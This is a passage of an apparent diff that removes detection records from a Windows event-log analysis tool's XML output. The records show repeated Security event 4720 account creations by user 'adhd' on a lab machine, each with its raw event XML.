Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Dorothy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4855</recordid>
-            <time>2020-06-11 22:05:04.286082800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.2860828Z'/&gt;&lt;EventRecordID&gt;4855&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Ryan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1135&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Ryan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Ryan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4849</recordid>
-            <time>2020-06-11 22:05:04.116019500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.1160195Z'/&gt;&lt;EventRecordID&gt;4849&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Abigail&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1134&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Abigail&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Abigail</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4843</recordid>
-            <time>2020-06-11 22:05:04.19943600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:04.0199436Z'/&gt;&lt;EventRecordID&gt;4843&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Philip&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1133&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Philip&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Philip</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4837</recordid>
-            <time>2020-06-11 22:05:03.947118900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.9471189Z'/&gt;&lt;EventRecordID&gt;4837&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Lori&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1132&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Lori&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Lori</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4831</recordid>
-            <time>2020-06-11 22:05:03.862304200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.8623042Z'/&gt;&lt;EventRecordID&gt;4831&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Andrew&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1131&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Andrew&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Andrew</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4825</recordid>
-            <time>2020-06-11 22:05:03.772439300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.7724393Z'/&gt;&lt;EventRecordID&gt;4825&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Stephanie&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1130&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Stephanie&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Stephanie</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4819</recordid>
-            <time>2020-06-11 22:05:03.690567200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.6905672Z'/&gt;&lt;EventRecordID&gt;4819&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jonathan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1129&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jonathan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jonathan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4813</recordid>
-            <time>2020-06-11 22:05:03.594471200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.5944712Z'/&gt;&lt;EventRecordID&gt;4813&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Judith&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1128&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Judith&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Judith</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4807</recordid>
-            <time>2020-06-11 22:05:03.505363700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:03.5053637Z'/&gt;&lt;EventRecordID&gt;4807&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Christine&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1127&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Christine&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data 